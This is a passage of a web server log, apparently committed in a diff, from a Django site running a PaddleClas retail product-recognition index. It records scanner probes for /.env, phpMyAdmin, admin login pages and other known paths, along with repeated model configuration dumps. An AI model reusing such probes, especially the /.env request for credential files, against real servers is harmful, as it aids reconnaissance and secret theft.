bytes} [Wed Feb 2 03:12:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 244/280] 106.15.197.115 () {38 vars in 692 bytes} [Wed Feb 2 03:12:40 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 245/281] 106.15.197.115 () {38 vars in 658 bytes} [Wed Feb 2 03:12:40 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 246/282] 106.15.197.115 () {38 vars in 695 bytes} [Wed Feb 2 03:12:40 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 247/283] 106.15.197.115 () {40 vars in 755 bytes} [Wed Feb 2 03:12:40 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 248/284] 106.15.197.115 () {40 vars in 757 bytes} [Wed Feb 2 03:12:40 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 249/285] 106.15.197.115 () {40 vars in 787 bytes} [Wed Feb 2 03:12:40 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 250/286] 106.15.197.115 () {40 vars in 767 bytes} [Wed Feb 2 03:12:41 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 251/287] 106.15.197.115 () {40 vars in 757 bytes} [Wed Feb 2 03:12:41 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 252/288] 106.15.197.115 () {40 vars in 757 bytes} [Wed Feb 2 03:12:41 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 253/289] 106.15.197.115 () {40 vars in 743 bytes} [Wed Feb 2 03:12:41 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 254/290] 139.196.127.159 () {34 vars in 605 bytes} [Wed Feb 2 03:58:46 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 255/291] 139.196.127.159 () {34 vars in 651 bytes} [Wed Feb 2 03:58:46 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 256/292] 139.196.127.159 () {34 vars in 617 bytes} [Wed Feb 2 03:58:46 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 257/293] 139.196.127.159 () {34 vars in 654 bytes} [Wed Feb 2 03:58:46 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 6 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 258/294] 139.196.127.159 () {36 vars in 714 bytes} [Wed Feb 2 03:58:46 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 259/295] 139.196.127.159 () {36 vars in 716 bytes} [Wed Feb 2 03:58:46 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 260/296] 139.196.127.159 () {36 vars in 746 bytes} [Wed Feb 2 03:58:46 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 261/297] 139.196.127.159 () {36 vars in 726 bytes} [Wed Feb 2 03:58:46 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 262/298] 139.196.127.159 () {36 vars in 744 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 263/299] 139.196.127.159 () {36 vars in 784 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 264/300] 139.196.127.159 () {36 vars in 754 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 265/301] 139.196.127.159 () {36 vars in 750 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 266/302] 139.196.127.159 () {36 vars in 762 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 267/303] 139.196.127.159 () {36 vars in 782 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 24/304] 139.196.127.159 () {36 vars in 746 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 25/305] 139.196.127.159 () {36 vars in 750 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 26/306] 139.196.127.159 () {36 vars in 716 bytes} [Wed Feb 2 03:58:46 2022] GET /phpMyAdmin/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 27/307] 139.196.127.159 () {36 vars in 716 bytes} [Wed Feb 2 03:58:46 2022] GET /phpmyadmin/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 28/308] 139.196.127.159 () {36 vars in 702 bytes} [Wed Feb 2 03:58:46 2022] GET /wcm/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 268/309] 83.97.20.34 () {30 vars in 328 bytes} [Wed Feb 2 04:12:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 269/310] 106.14.116.241 () {34 vars in 604 bytes} [Wed Feb 2 04:28:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 29/311] 106.14.116.241 () {34 vars in 650 bytes} [Wed Feb 2 04:28:56 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 30/312] 106.14.116.241 () {34 vars in 616 bytes} [Wed Feb 2 04:28:56 2022] GET /admin/ => generated 0 bytes in 2 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 31/313] 106.14.116.241 () {34 vars in 653 bytes} [Wed Feb 2 04:28:56 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 270/314] 106.14.116.241 () {36 vars in 711 bytes} [Wed Feb 2 04:28:56 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 271/315] 106.14.116.241 () {36 vars in 714 bytes} [Wed Feb 2 04:28:56 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 272/316] 106.14.116.241 () {36 vars in 744 bytes} [Wed Feb 2 04:28:56 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 273/317] 106.14.116.241 () {36 vars in 724 bytes} [Wed Feb 2 04:28:56 2022] GET /images/ofbiz.ico => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 274/318] 106.14.116.241 () {36 vars in 742 bytes} [Wed Feb 2 04:28:56 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 275/319] 106.14.116.241 () {36 vars in 782 bytes} [Wed Feb 2 04:28:56 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 276/320] 106.14.116.241 () {36 vars in 752 bytes} [Wed Feb 2 04:28:56 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 1/321] 106.14.116.241 () {36 vars in 748 bytes} [Wed Feb 2 04:28:56 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 237 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 277/322] 106.14.116.241 () {36 vars in 760 bytes} [Wed Feb 2 04:28:57 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 278/323] 106.14.116.241 () {36 vars in 780 bytes} [Wed Feb 2 04:28:57 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 279/324] 106.14.116.241 () {36 vars in 744 bytes} [Wed Feb 2 04:28:57 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 280/325] 106.14.116.241 () {36 vars in 749 bytes} [Wed Feb 2 04:28:57 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 281/326] 106.14.116.241 () {36 vars in 715 bytes} [Wed Feb 2 04:28:57 2022] GET /phpMyAdmin/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 282/327] 106.14.116.241 () {36 vars in 715 bytes} [Wed Feb 2 04:28:57 2022] GET /phpmyadmin/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 12/328] 106.14.116.241 () {36 vars in 701 bytes} [Wed Feb 2 04:28:57 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 283/329] 109.237.103.123 () {36 vars in 525 bytes} [Wed Feb 2 05:43:07 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 284/330] 136.144.41.117 () {40 vars in 568 bytes} [Wed Feb 2 06:10:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 285/331] 74.82.47.2 () {28 vars in 304 bytes} [Wed Feb 2 06:18:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 286/332] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 2 06:54:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 287/333] 36.79.240.95 () {32 vars in 463 bytes} [Wed Feb 2 06:54:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 288/334] 62.171.132.199 () {40 vars in 672 bytes} [Wed Feb 2 07:30:37 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 289/335] 66.240.236.116 () {34 vars in 394 bytes} [Wed Feb 2 07:32:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 290/336] 23.90.160.114 () {34 vars in 487 bytes} [Wed Feb 2 08:44:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 291/337] 23.90.160.114 () {34 vars in 507 bytes} [Wed Feb 2 08:44:02 2022] GET /analytics/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 292/338] 103.203.57.7 () {32 vars in 398 bytes} [Wed Feb 2 08:51:47 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 293/339] 192.241.208.210 () {34 vars in 395 bytes} [Wed Feb 2 09:00:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 294/340] 83.97.20.34 () {30 vars in 329 bytes} [Wed Feb 2 10:33:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 295/341] 106.14.121.178 () {34 vars in 604 bytes} [Wed Feb 2 11:01:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 13/342] 106.14.121.178 () {34 vars in 650 bytes} [Wed Feb 2 11:01:03 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 296/343] 106.14.121.178 () {34 vars in 616 bytes} [Wed Feb 2 11:01:03 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 297/344] 106.14.121.178 () {34 vars in 653 bytes} [Wed Feb 2 11:01:03 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 298/345] 106.14.121.178 () {36 vars in 713 bytes} [Wed Feb 2 11:01:03 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 299/346] 106.14.121.178 () {36 vars in 715 bytes} [Wed Feb 2 11:01:03 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 300/347] 106.14.121.178 () {36 vars in 745 bytes} [Wed Feb 2 11:01:03 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 301/348] 106.14.121.178 () {36 vars in 725 bytes} [Wed Feb 2 11:01:03 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 302/349] 106.14.121.178 () {36 vars in 743 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 303/350] 106.14.121.178 () {36 vars in 783 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 304/351] 106.14.121.178 () {36 vars in 753 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 305/352] 106.14.121.178 () {36 vars in 749 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 306/353] 106.14.121.178 () {36 vars in 761 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 307/354] 106.14.121.178 () {36 vars in 781 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 32/355] 106.14.121.178 () {36 vars in 745 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 33/356] 106.14.121.178 () {36 vars in 749 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 34/357] 106.14.121.178 () {36 vars in 715 bytes} [Wed Feb 2 11:01:04 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 35/358] 106.14.121.178 () {36 vars in 715 bytes} [Wed Feb 2 11:01:04 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 36/359] 106.14.121.178 () {36 vars in 701 bytes} [Wed Feb 2 11:01:04 2022] GET /wcm/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 308/360] 178.32.197.83 () {32 vars in 500 bytes} [Wed Feb 2 11:38:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 309/361] 23.251.102.74 () {34 vars in 487 bytes} [Wed Feb 2 11:45:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 310/362] 195.154.62.232 () {32 vars in 523 bytes} [Wed Feb 2 12:30:41 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 311/363] 2.57.121.59 () {34 vars in 400 bytes} [Wed Feb 2 12:40:11 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 312/364] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 2 12:45:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 313/365] 106.14.158.121 () {38 vars in 646 bytes} [Wed Feb 2 14:16:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 314/366] 106.14.158.121 () {38 vars in 692 bytes} [Wed Feb 2 14:16:01 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 315/367] 106.14.158.121 () {38 vars in 658 bytes} [Wed Feb 2 14:16:01 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 316/368] 106.14.158.121 () {38 vars in 695 bytes} [Wed Feb 2 14:16:01 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 317/369] 106.14.158.121 () {40 vars in 755 bytes} [Wed Feb 2 14:16:01 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 318/370] 106.14.158.121 () {40 vars in 757 bytes} [Wed Feb 2 14:16:01 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 319/371] 106.14.158.121 () {40 vars in 787 bytes} [Wed Feb 2 14:16:01 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 320/372] 106.14.158.121 () {40 vars in 767 bytes} [Wed Feb 2 14:16:01 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 321/373] 106.14.158.121 () {40 vars in 757 bytes} [Wed Feb 2 14:16:01 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 322/374] 106.14.158.121 () {40 vars in 757 bytes} [Wed Feb 2 14:16:01 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 323/375] 106.14.158.121 () {40 vars in 743 bytes} [Wed Feb 2 14:16:01 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 7676] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 324/376] 35.195.93.98 () {42 vars in 561 bytes} [Wed Feb 2 15:07:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 325/377] 49.79.98.245 () {36 vars in 800 bytes} [Wed Feb 2 15:10:04 2022] POST /search/ => generated 20262 bytes in 10 msecs (HTTP/1.1 200) 5 headers in 160 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 326/378] 2.57.121.59 () {34 vars in 400 bytes} [Wed Feb 2 15:10:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 14/379] 49.79.98.245 () {36 vars in 800 bytes} [Wed Feb 2 15:10:17 2022] POST /search/ => generated 20262 bytes in 13 msecs (HTTP/1.1 200) 5 headers in 160 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 327/380] 49.79.98.245 () {36 vars in 800 bytes} [Wed Feb 2 15:10:38 2022] POST /search/ => generated 20262 bytes in 9 msecs (HTTP/1.1 200) 5 headers in 160 bytes (1 switches on core 0) +2022-02-02 15:10:56 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:10:56 INFO: Global : +2022-02-02 15:10:56 INFO: batch_size : 32 +2022-02-02 15:10:56 INFO: cpu_num_threads : 1 +2022-02-02 15:10:56 INFO: enable_benchmark : True +2022-02-02 15:10:56 INFO: enable_mkldnn : True +2022-02-02 15:10:56 INFO: enable_profile : False +2022-02-02 15:10:56 INFO: gpu_mem : 8000 +2022-02-02 15:10:56 INFO: ir_optim : True +2022-02-02 15:10:56 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:10:56 INFO: use_fp16 : False +2022-02-02 15:10:56 INFO: use_gpu : False +2022-02-02 15:10:56 INFO: use_tensorrt : False +2022-02-02 15:10:56 INFO: IndexProcess : +2022-02-02 15:10:56 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:10:56 INFO: delimiter : +2022-02-02 15:10:56 INFO: dist_type : IP +2022-02-02 15:10:56 INFO: embedding_size : 512 +2022-02-02 15:10:56 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:10:56 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:10:56 INFO: index_method : HNSW32 +2022-02-02 15:10:56 INFO: index_operation : new +2022-02-02 15:10:56 INFO: RecPostProcess : None +2022-02-02 15:10:56 INFO: RecPreProcess : +2022-02-02 15:10:56 INFO: transform_ops : +2022-02-02 15:10:56 INFO: ResizeImage : +2022-02-02 15:10:56 INFO: size : 224 +2022-02-02 15:10:56 INFO: NormalizeImage : +2022-02-02 15:10:56 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:10:56 INFO: order : +2022-02-02 15:10:56 INFO: scale : 0.00392157 +2022-02-02 15:10:56 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:10:56 INFO: ToCHWImage : None + 0%| | 0/190 [00:00 generated 34 bytes in 7452 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-02-02 15:11:17 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:11:17 INFO: Global : +2022-02-02 15:11:17 INFO: batch_size : 32 +2022-02-02 15:11:17 INFO: cpu_num_threads : 1 +2022-02-02 15:11:17 INFO: enable_benchmark : True +2022-02-02 15:11:17 INFO: enable_mkldnn : True +2022-02-02 15:11:17 INFO: enable_profile : False +2022-02-02 15:11:17 INFO: gpu_mem : 8000 +2022-02-02 15:11:17 INFO: ir_optim : True +2022-02-02 15:11:17 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:11:17 INFO: use_fp16 : False +2022-02-02 15:11:17 INFO: use_gpu : False +2022-02-02 15:11:17 INFO: use_tensorrt : False +2022-02-02 15:11:17 INFO: IndexProcess : +2022-02-02 15:11:17 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:11:17 INFO: delimiter : +2022-02-02 15:11:17 INFO: dist_type : IP +2022-02-02 15:11:17 INFO: embedding_size : 512 +2022-02-02 15:11:17 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:11:17 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:11:17 INFO: index_method : HNSW32 +2022-02-02 15:11:17 INFO: index_operation : new +2022-02-02 15:11:17 INFO: RecPostProcess : None +2022-02-02 15:11:17 INFO: RecPreProcess : +2022-02-02 15:11:17 INFO: transform_ops : +2022-02-02 15:11:17 INFO: ResizeImage : +2022-02-02 15:11:17 INFO: size : 224 +2022-02-02 15:11:17 INFO: NormalizeImage : +2022-02-02 15:11:17 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:11:17 INFO: order : +2022-02-02 15:11:17 INFO: scale : 0.00392157 +2022-02-02 15:11:17 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:11:17 INFO: ToCHWImage : None + 0%| | 0/189 [00:00 generated 34 bytes in 7469 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-02-02 15:11:30 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == 